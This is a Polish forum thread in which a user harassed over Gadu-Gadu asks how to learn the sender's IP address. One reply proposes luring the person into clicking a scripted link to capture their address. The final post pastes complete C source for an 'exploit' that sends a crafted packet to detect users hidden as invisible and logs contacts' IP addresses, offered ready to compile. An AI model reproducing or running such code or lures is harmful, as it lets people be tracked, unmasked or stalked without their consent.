Pokaż wyniki 1 do 7 z 7

Temat: rozpoznanie intruza używającego tlenu

  1. #1
    Zarejestrowany
    May 2007
    Postów
    2

    Domyślnie rozpoznanie intruza używającego tlenu

    Witam.

    Ostatnio poznałem pewną osobę. Od tego momentu dostaje codziennie albo kilka razy dziennie durne wiadomosci gg (uzywam linuxowego kadu). Osoba która podejrzewam prawdopodobnie uzywa tlenu. Chcialbym sie dowiedziec czy istnieje mozliwosc aby poznac jej IP albo MAC. Przechwycone w Wiresharku pakiety zawieraja adres IP serwera GG a nie adres tej osoby. Z gory dziekuje za pomoc.

  2. #2
    Zarejestrowany
    Feb 2007
    Skąd
    w domu :D
    Postów
    535

    Domyślnie

    Jeśli używasz komunikatora GG to zobacz informacje o uzytkowniku moze sie pojawi IP jesli on ma cie na liscie a ty jego to powinno wyswietlic <duzo osob ma problem z wyciągnienciem IP od jakiegos uzytkownika wcale to takie łatwe nie jest jak sie wydaje

    Jesli informaor nie pokaze spróbuj power GG zainstalowac powinno pomóc

    PS:Mialem kedys taki programik no ale gdzies mi sie zapodział

    pozdrawiam
    Pamiętaj zanim zapytasz sprawdź ten adres www.google.pl

  3. #3
    Avatar eMCe
    eMCe jest offline Emil Grzegorz Gubała
    Zarejestrowany
    Dec 2006
    Skąd
    Kielce
    Postów
    1,767

    Domyślnie

    o MAC możesz zapomnieć..
    jeśli chodzi o gg - to protokół jest jeden - czy to idzie przez tlen czy nie -
    z tego co wiem i z tego co mi rozsądek podpowiada -nigdy sie tym nie interesowałem wnikliwie -

    czyli poczytaj forum a będziesz wiedział w jakich przypadkach dostaniesz IP a w jakich nie i jakich programów do tego użyć!
    Agencja reklamy kielce (mały kilkudniowy case pozycjonerski )

  4. #4
    Zarejestrowany
    May 2007
    Postów
    2

    Domyślnie

    Power gg i gadu pokazuja ip w momencie gdy dana osoba sie uaktywni (direct connect). W przeciwnym przypadku komunikacja odbywa sie przez serwer gg. i dlatego mam problem. Ta osoba jest ciegle niewidoczna...

  5. #5
    Zarejestrowany
    Jan 2007
    Postów
    695

    Domyślnie

    Hmmm....o ile pamiętam to w najnowszym gg chyba było jakaś wtyczka która pokazywała czy ktoś jest niedost. czy niewidoczny. Chyba na zasadzie zmiany opisu czy coś Monitorował wszystko na bieżąco. Poprawcie mnie jeśli nie mam racji ale wydaje mi sie ze ip wyświetli nam tylko wtedy kiedy druga osoba ma włączone p2p lub nie jest poza NAT'em. Zawsze pozostaje napisać skrypt pod HTML czy coś takiego i liczyć na to że intruz wejdzie w linka podanego mu przez nas
    EDIT: o tej wtyczce wspomniałem ponieważ może idzie jakoś monitorować także połączenie?

  6. #6
    Avatar kaspsior
    kaspsior jest offline يحشطخبؤءفنو٢٥٣كهي
    Zarejestrowany
    May 2007
    Postów
    406

    Domyślnie

    z tego co pamiętam to wraz z wejściem GG v.7 to wykrywanie niewidocznych nie działa ( ggspy i pochodne ), poza tym z niektórymi innymi komunikatorami był kłopot - działał niepoprawnie --> wyświetlały się "puste obrazki" skanowanym osobom

  7. #7
    Zarejestrowany
    Feb 2007
    Skąd
    w domu :D
    Postów
    535

    Domyślnie

    Hhmmm a ja mam exploita do wykrywania niewidocznosci bardzo prosty w użyciu:

    Kod:
    /*
     * Wykrywanie niewidzialnosci w Gadu-Gadu
     * Maciej Soltysiak <[email protected]>
     *
     * Program wymaga libgadu
     *
     * compile:
     * gcc -o gadu gadu.c -lgadu
     * Jak buczy o ssl to dodaj -lssl
     *
     * use:
     * ./gadu <uin> <haslo> <ofiara>
     *
     * Wymagania:
     * - ofiara musi miec uin w kontaktach
     * - ofiara musi obslugiwac wiadomosci obrazkowe (miec limit rozmiaru > 0)
     *
     * Jesli chcesz zastosowac te metode w swoim programie pamietaj, ze
     * jest to kod dystrybuowany na licencji:
     * Creative Commons Uznanie autorstwa-Na tych samych warunkach 2.0
     * http://creativecommons.org/licenses/by-sa/2.0/pl/
     *
     * Nie pytaj mnie jak to skompilowac pod windows!
     * ctrl+c przerywa program, wylogowujac sie ladnie.
     *
     * Program uzywa do logowania rozszerzenia GNU vasprintf() jak Ci
     * to nie pasuje przepisz kod. Ja bylem leniwy.
     *
     */
    #define _GNU_SOURCE
    #include <stdio.h>
    #include <string.h>
    #include <sys/time.h>
    #include <libgadu.h>
    #include <signal.h>
    
    static inline void log_simple(const char *txt)
    {
     fprintf(stderr, "%s\n", txt);
    }
    
    void log_string(const char *fmt, ...)
    {
     char *buf;
     va_list args;
     int n;
     
     va_start(args, fmt);
     n = vasprintf(&buf, fmt, args);
     va_end(args);
    
     if (n >= 0)
     {
      if (fprintf(stderr, "%s\n", buf) < 0)
       log_simple("log_string: fprintf returned an error");
      free(buf);
     }
     else
      log_simple("log_string: vasprintf failed");
    
     return;
    }
    
    
    /* Global Gadu-Gadu handle */
    struct gg_session *gadu_sess = NULL;
    
    #define GG_CONN_TIMEOUT 10
    
    
    static inline void gadu_disconnect(void)
    {
     if (gadu_sess != NULL)
     {
      log_simple("gadu_disconnect");
      gg_logoff(gadu_sess);
      gg_free_session(gadu_sess);
     }
     exit(1);
    }
    
    static void init_signals(void)
    {
     struct sigaction sigact;
    
     sigact.sa_flags = SA_NODEFER;
     sigact.sa_handler = (void *) gadu_disconnect;
     sigemptyset(&sigact.sa_mask);
    
     sigaction(SIGTERM, &sigact, NULL);
     sigaction(SIGHUP, &sigact, NULL);
     sigaction(SIGQUIT, &sigact, NULL);
     sigaction(SIGINT, &sigact, NULL);
    }
    
    
    static inline void gadu_connect(int uin, char *pass)
    {
     struct gg_login_params gadu_p;
     fd_set rd, wd;
     struct gg_event *e;
     struct timeval tv;
     int ret;
    
     memset(&gadu_p, 0, sizeof(gadu_p));
     gadu_p.uin = uin;
     gadu_p.password = pass;
     gadu_p.async = 1;
    
     gadu_sess = gg_login(&gadu_p);
     
     for (;;) {
      FD_ZERO(&rd);
      FD_ZERO(&wd);
    
      if ((gadu_sess->check & GG_CHECK_READ))
       FD_SET(gadu_sess->fd, &rd);
      if ((gadu_sess->check & GG_CHECK_WRITE))
       FD_SET(gadu_sess->fd, &wd);
    
      tv.tv_sec = GG_CONN_TIMEOUT;
      tv.tv_usec = 0;
      
      ret = select(gadu_sess->fd + 1, &rd, &wd, NULL, &tv);
     
      if (!ret) {
       gadu_disconnect();
      } else {
       if (gadu_sess && (FD_ISSET(gadu_sess->fd, &rd) || FD_ISSET(gadu_sess->fd, &wd))) {
        if (!(e = gg_watch_fd(gadu_sess))) {
         log_simple("gadu_connect: connection lost!");
         gadu_disconnect();
        }
        if (e->type == GG_EVENT_CONN_SUCCESS) {
         log_simple("gadu_connect: success.");
         gg_free_event(e);
         break;
        }
        if (e->type == GG_EVENT_CONN_FAILED) {
         log_simple("gadu_connect: failed.");
         gg_free_event(e);
         gadu_disconnect();
        }
        gg_free_event(e);
       }
      }
     }
    
     gg_change_status(gadu_sess, GG_STATUS_INVISIBLE);
    }
    
    static inline void update_gadu(void)
    {
     struct gg_event *e;
     
     if ((e = gg_watch_fd(gadu_sess)))
     {
      switch(e->type)
      {
      case GG_EVENT_IMAGE_REQUEST:
       log_simple("Gosciu jest online!");
       break;
      case GG_EVENT_NOTIFY60:
       log_string("notify: %d %d %d.%d.%d.%d %d %d '%s'\r\n",
        e->event.notify60->uin,
        e->event.notify60->status,
        e->event.notify60->remote_ip & 0xff,
        (e->event.notify60->remote_ip >> 8) & 0xff,
        (e->event.notify60->remote_ip >> 16) & 0xff,
        e->event.notify60->remote_ip >> 24,
        e->event.notify60->remote_port,
        e->event.notify60->version,
        e->event.notify60->descr);
       break;
      case GG_EVENT_STATUS60:
       log_string("status: %d %d %d.%d.%d.%d %d %d '%s'\r\n",
        e->event.status60.uin,
        e->event.status60.status,
        e->event.status60.remote_ip & 0xff,
        (e->event.status60.remote_ip >> 8) & 0xff,
        (e->event.status60.remote_ip >> 16) & 0xff,
        e->event.status60.remote_ip >> 24,
        e->event.status60.remote_port,
        e->event.status60.version,
        e->event.status60.descr);
       break;
      case GG_EVENT_DISCONNECT:
       gadu_disconnect();
      case GG_EVENT_ACK:
       log_string("update_gg: ACK from %d. %d %d\r\n",
        e->event.ack.recipient,
        e->event.ack.status,
        e->event.ack.seq);
       break;
      }
     }
    
     gg_free_event(e);
    }
    
    
    int main(int argc, char *argv[])
    {
     uin_t v_uin; /* victim */
     uin_t a_uin; /* attacker */
    
     if (argc != 4)
     {
      log_simple("skladnia: gadu <twoj_uin> <twoje_haslo> <uin_ofiary>\n" \
          "Pamietaj wylogowac sie ze swojegu uina z gadu.");
      return 0;
     }
    
     if ((a_uin = atoi(argv[1])) <= 0)
     {
      log_simple("Podaj twoj poprawny numer.");
      return 0;
     }
     
     if ((v_uin = atoi(argv[3])) > 0)
     {
      /*
       * ethereal + tcpdump rzadza !
       */
      unsigned char code[] = { 0x00, 0x02, 0x0d, 0x00, 0x00, 0x00, 0x80, 0x09, 0x01, 0xaf, 0xa8, 0x00, 0x00, 0x9f, 0xc1, 0xee, 0x84 };
    
      init_signals();
    
      gadu_connect(a_uin, argv[2]);
    
      gg_notify(gadu_sess, &v_uin, sizeof(uin_t));
    
      gg_send_message_ctcp(gadu_sess, 0x28, v_uin, code, sizeof(code));
    
      for(;;)
       update_gadu();
     }
    
     return 0;
    }
    wystarczy skompilowacDobrze
    pozdrawiam
    Pamiętaj zanim zapytasz sprawdź ten adres www.google.pl

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52